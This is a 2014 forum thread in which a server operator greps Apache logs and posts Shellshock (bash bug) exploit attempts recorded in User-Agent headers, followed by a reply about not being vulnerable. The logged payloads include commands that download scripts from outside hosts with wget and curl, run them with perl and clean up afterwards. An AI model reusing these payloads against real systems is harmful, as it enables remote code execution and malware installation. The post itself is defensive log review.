View unanswered posts | View active topics It is currently Thu Jun 21, 2018 9:57 pm



Reply to topic  [ 2 posts ] 
Shell Shocked 
Author Message
DARKie
User avatar

Joined: Thu Jul 22, 2004 8:48 pm
Posts: 436
Location: Ann Arbor, Michigan, USA
Post Shell Shocked
Here is a query to see who's been trying to hack this server with the bash bug:

Code:
rcv@troy2:~$ grep '() { :;};' /var/log/apache2/access_log.1
89.207.135.125 - - [25/Sep/2014:06:40:29 -0400] mail.mdve.net "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 303 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
89.207.135.125 - - [25/Sep/2014:06:42:05 -0400] * "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 291 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
94.75.234.44 - - [26/Sep/2014:08:59:35 -0400] 208.64.36.69 "GET /cgi-bin/ HTTP/1.0" 403 288 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.70 "GET /cgi-bin/ HTTP/1.0" 403 288 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.73 "GET /cgi-bin/ HTTP/1.0" 404 284 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
94.75.234.44 - - [26/Sep/2014:08:59:36 -0400] 208.64.36.75 "GET /cgi-bin/ HTTP/1.0" 404 284 "-" "() { :;}; /bin/bash -c \"wget vfconsult.nl/wakakakaka\""
54.251.83.67 - - [27/Sep/2014:12:41:22 -0400] 208.64.36.75 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [27/Sep/2014:12:54:30 -0400] 208.64.36.73 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
rcv@troy2:~$ grep '() { :;};' /var/log/apache2/access_log
173.45.100.18 - - [28/Sep/2014:20:12:41 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
173.45.100.18 - - [28/Sep/2014:20:12:41 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
54.251.83.67 - - [29/Sep/2014:01:59:25 -0400] 208.64.36.70 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
54.251.83.67 - - [29/Sep/2014:07:25:02 -0400] 208.64.36.69 "GET / HTTP/1.1" 200 119 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
142.4.215.115 - - [30/Sep/2014:04:55:52 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [30/Sep/2014:04:55:52 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [01/Oct/2014:02:10:52 -0400] 208.64.36.69 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
142.4.215.115 - - [01/Oct/2014:02:10:52 -0400] 208.64.36.70 "GET /cgi-bin/hi HTTP/1.0" 404 286 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\""
98.126.4.18 - - [01/Oct/2014:14:10:19 -0400] darkhq.com "GET /cgi-bin/hi HTTP/1.1" 404 284 "-" "() { :;};echo mizwkafnh7bvh6sk2dr2$(curl 'http://best-home-based-business-idea.com/bash_count.php?%64%61%72%6B%68%71%2E%63%6F%6D'; wget -qO- 'http://best-home-based-business-idea.com/bash_count.php?%64%61%72%6B%68%71%2E%63%6F%6D';)mizwkafnh7bvh6sk2dr2"


Ha ha, go away script kiddies, we're all patched here!

_________________
Image


Fri Oct 03, 2014 8:54 am
Profile ICQ YIM WWW
DARKie
User avatar

Joined: Sun Feb 16, 2014 6:56 pm
Posts: 130
Post Re: Shell Shocked
WeaselSqueezer wrote:
Ha ha, go away script kiddies, we're all patched here!


Lulz, we (player.me) were already never vulnerable to this because of us never using apache, cgi (fastcgi isn't vuln), nor exposing anything other than what was necessary. We actually did get quite a few attempts on day zero though, to no avail! :D

_________________
Image
Image

Image Image Image Image Image


Fri Oct 03, 2014 5:09 pm
Profile
Display posts from previous:  Sort by  
Reply to topic   [ 2 posts ] 

Who is online

Users browsing this forum: No registered users and 7 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
cron
Copyright © 2014, Multi-Dimensional Visual Echo. All rights reserved.
Powered by hamsters on treadmills drinking coffee © 2000, 2002, 2005, 2007 phpBB Group.
Designed by ST Software for PTF.